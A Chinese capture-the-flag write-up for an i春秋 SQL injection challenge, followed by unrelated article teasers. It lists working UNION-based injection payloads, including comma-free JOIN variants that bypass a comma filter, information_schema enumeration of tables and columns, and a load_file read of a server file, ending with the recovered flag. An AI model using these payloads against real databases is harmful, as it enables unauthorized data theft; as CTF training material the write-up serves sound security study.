i春秋-SQLi（无逗号sql注入，-- -注释）

i春秋-SQLi（无逗号sql注入，-- -注释）

news/2024/11/14 6:12:24/文章来源:https://blog.csdn.net/2301_79090248/article/details/143718659

练习平台地址

竞赛中心

题目描述

后台有获取flag的线索应该是让我们检查源码找到后台

题目内容

空白一片

F12检查源码

发现login.php

访问login.php?id=1

F12没有提示尝试sql注入

常规sql注入

//联合注入得到表格列数

1' order by 3 #

1' union select 1,2,3 #（看哪个存在sql注入）

//查看当前权限
user()

//如果有root权限和绝对路径，可以使用load_file函数访问系统文件，将内容以字符串形式返回
1'/**/union/**/select 1,load_file("/var/www/html/flag.php"),3,4#

//拿数据库名
database()

//拿表名
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="xxx"#

//找表的字段
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="xxx"#

//找数据
1' union select 1,group_concat(data),3,4 from "xxx";#

参考WP

i春秋-后台有获取flag的线索-flag{6deb7ea8-4a31-4f48-ac7e-4d864c466a0a}_flag{c04165a53bec1848bfac2dfda3e667bb}-CSDN博客

发现是后台对逗号以后的输入做了截断处理

相关知识：无逗号注入语句

普通sql语句

union select group_concat(table_name) from information_schema.tables where table_schema=database(),user()

无逗号注入语句

union select * from ((select group_concat(table_name) from information_schema.tables where table_schema=database())a join (select user())b)

解题

真正的注入页面是l0gin.php

order by 3时返回异常，表有两列

?id=1' order by 3-- -

查看哪里有回显点

-1' union select * from (select 1) a join (select 2) b-- -

爆表

这里也可以先查询数据库名字，有时候这里database()无法执行成功

?id=-1' union select * from (select 1) a join (select group_concat(table_name) from information_schema.tables where table_schema = database()) b-- -

爆字段名

?id=-1' union select * from (select 1) a join (select group_concat(column_name) from information_schema.columns where table_name = 'users') b-- -

发现flag,构造payload查询

-1' union select * from (select 1) a join (select group_concat(flag_9c861b688330) from users) b-- -

flag

flag{555913f1-3553-4fcf-a51b-5f6f1c5ccb13}

注意事项

1.注释的类型，#,--+,-- -,--

2.注意判断后台过滤字符并构建payload

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.xdnf.cn/news/14625.html

如若内容造成侵权/违法违规/事实不符，请联系一条长河网进行投诉反馈，一经查实，立即删除！

相关文章

基于Spring Boot的电子商务平台架构

基于Spring Boot的电子商务平台架构

2 相关技术 2.1 SpringBoot框架介绍 Spring Boot是一种不需要代码生成的一种框架，并且可以不需要配置任何的XML文件就可以，因为Spring Boot里面自带了很多接口，只需要配置不同的接口就会自动的应用并且识别需要的依赖，在配置方面非…

阅读更多...

华为云分布式缓存服务（DCS）专家深度解析Valkey，助力openEuler峰会

华为云分布式缓存服务（DCS）专家深度解析Valkey，助力openEuler峰会

在数字化时代，开源技术已成为推动创新和协作的重要力量。 11月15日，openEuler峰会将于北京中关村国际创新中心举行。本次峰会，华为云分布式缓存服务（DCS）的两位专家将为大家深入讲解Valkey的核心特性与优势。更多大…

阅读更多...

如何进行产线高阶能耗数据的计算和可视化?

如何进行产线高阶能耗数据的计算和可视化?

一、前言在当前经济下行时期，越来越来多企业开始对产线进行数字化转型，提高企业竞争力。在产线数字化转型过程中，产线高阶能耗数据的计算和可视化是比较重要的一环，今天小编就和大家分享如何对产线能耗数据进行计算和可视化。 …

阅读更多...

vsftp 修改端口限制用户登录开启防火墙 pasv模式

vsftp 修改端口限制用户登录开启防火墙 pasv模式

安装设置开机启动 yum -y install vsftpd systemctl start vsftpd systemctl enable vsftpd 修改配置，追加端口号到最后一行 vim /etc/vsftpd/vsftpd.conf listen_port5510 编辑 /etc/services 文件，将其中的三行端口改成5510 vim /etc/services ftp …

阅读更多...

IntelliJ IDEA插件开发-代码补全插件入门开发

IntelliJ IDEA插件开发-代码补全插件入门开发

使用IntelliJ IDEA想必大家都有使用过代码自动补全功能，如输入ab，会自动触发补全，提供相应的补全建议列表。作为有追求的程序员，有没有想过这样的功能是如何实现的？本节将详细介绍如何实现一个类似的代码自动补全插件。…

阅读更多...

❤React-React 组件基础（类组件）

❤React-React 组件基础（类组件）

❤React-React 组件基础 1、组件化开发介绍组件化开发思想：分而治之 React的组件按照不同的方式可以分成类组件： 划分方式一（按照组件的定义方式） 函数组件(Functional Component )和类组件(Class Component)； …

阅读更多...

Python →爬虫实践

Python →爬虫实践

爬取研究中心的书目现在，想要把如下网站中的书目信息爬取出来。案例一耶鲁 Publications | Yale Law School 分析网页，如下图所示，需要爬取的页面，标签信息是“<p>”，所以用 itemssoup.find_all("p&…

阅读更多...

机器学习： LightGBM模型（优化版）——高效且强大的树形模型

机器学习： LightGBM模型（优化版）——高效且强大的树形模型

LightGBM（Light Gradient Boosting Machine）是一种基于梯度提升决策树（GBDT）的框架，由微软提出。它具有高效的训练速度、低内存占用、支持并行和GPU加速等特点，非常适合大规模数据的训练任务，尤…

阅读更多...

《内存函数》

《内存函数》

内存函数 1. memcpy函数 （1）介绍这里通过memcpy的定义我们可以看这个函数包含三个参数，destination就是拷贝的目的地，source就是拷贝的源头，num就是拷贝的个数。 （2）使用这里要包含头文件s…

阅读更多...

不泄密的安全远程控制软件需要哪些技术

不泄密的安全远程控制软件需要哪些技术

在数字化浪潮中，远程控制软件已不再是简单的辅助工具，而是成为企业运作和日常工作中不可或缺的一部分。随着远程办公模式的广泛采纳，这些软件提供了一种既安全又高效的途径来管理和访问远端系统。无论是在家办公、技术支持还是远程教育&#…

阅读更多...

Pycharm打开终端时报错：Cannot open Local,Failed to start[powershell.exe]

Pycharm打开终端时报错：Cannot open Local,Failed to start[powershell.exe]

问题如下： 解决办法： 修改设置中的shell path路径英文版pycharm：file -> settings -> Tools -> Terminal -> Shell path 中文版pycharm：文件 -> 设置 -> 工具 -> 终端 -> Shell路径将Shell路径不全 …

阅读更多...

15分钟学 Go 第 51 天：通用库与工具使用

15分钟学 Go 第 51 天：通用库与工具使用

第51天：通用库与工具使用一、学习目标类别工具/库用途命令行工具cobra构建命令行应用JSON处理gjson高效JSON解析HTTP客户端restyHTTP请求处理日期处理carbon时间日期操作配置管理viper配置文件处理二、详细实现让我们通过具体示例来学习这些库的使用&#x…

阅读更多...

基于微信小程序的乡村研学游平台设计与实现，LW+源码+讲解

基于微信小程序的乡村研学游平台设计与实现，LW+源码+讲解

摘要信息数据从传统到当代，是一直在变革当中，突如其来的互联网让传统的信息管理看到了革命性的曙光，因为传统信息管理从时效性，还是安全性，还是可操作性等各个方面来讲，遇到了互联网时代才发现能补上自…

阅读更多...

VLC-QT----Linux编译并运行示例

VLC-QT----Linux编译并运行示例

linux:ubuntu 16.04 qt:5.13.2 总体安装步骤下载安装,编译下载源码仓库,下载cmake,新建一个build文件夹,cd进去,执行代码 cmake .. -DCMAKE_BUILD_TYPEDebug 遇到报错,没有qt5Coreconfig,运行 sudo apt-get install qtdeclarative5-dev进行安装遇到报错 Could not fi…

阅读更多...

机器学习：XGBoost模型——高效且强大的树形模型

机器学习：XGBoost模型——高效且强大的树形模型

XGBoost（Extreme Gradient Boosting，极端梯度提升树）是一种强大的梯度提升算法，在现实中被广泛用于分类和回归任务。它通过集成多个简单的基学习器（通常是决策树）来构建一个强大的预测模型。基本原理步骤…

阅读更多...

爬虫开发工具与环境搭建——开发工具介绍

爬虫开发工具与环境搭建——开发工具介绍

第二章：爬虫开发工具与环境搭建第一节开发工具介绍爬虫开发需要一些合适的工具和框架来高效地抓取网页数据。在这节中，我们将介绍常用的开发工具，帮助开发者快速搭建爬虫开发环境。 1. Python与爬虫框架选择 Python因其简洁、易学的语法…

阅读更多...

python高级之面向对象编程

python高级之面向对象编程

一、面向过程与面向对象面向过程和面向对象都是一种编程方式，只不过再设计上有区别。 1、面向过程pop： 举例：孩子上学 1. 妈妈起床 2. 妈妈洗漱 3. 妈妈做饭 4. 妈妈把孩子叫起来 5. 孩子起床 6. 孩子洗漱 7. 孩子吃饭 8. 妈妈给孩子送学校…

阅读更多...

通过Docker实现openGauss的快速容器化安装

通过Docker实现openGauss的快速容器化安装

容器安装本章节主要介绍通过 Docker 安装 openGauss，方便 DevOps 用户的安装、配置和环境设置。支持的架构和操作系统版本 x86-64 CentOS 7.6 ARM64 openEuler 20.03 LTS 配置准备使用 buildDockerImage.sh 脚本构建 docker 镜像，buildDockerIm…

阅读更多...

康谋分享 | 确保AD/ADAS系统的安全：避免数据泛滥的关键

为确保AD/ADAS系统的安全性，各大车企通常需要收集、处理和分析来自于摄像头、激光雷达等传感器的数据，以找出提高系统安全性和性能的方法。然而在数据收集过程中，不可避免地会出现大量无价值数据，造成数据泛滥的情况，进…

阅读更多...

电工电子原理笔记

电工电子原理笔记

这一篇手记会记录我硬件开发过程中遇到的一些底层电学原理，并且结合实际场景作为“例题”（出于篇幅和保密考虑会进行部分简化）。叠加定理基本介绍在线性电路中，任一支路的电流（或电压）可以看成是电路…

阅读更多...

最新文章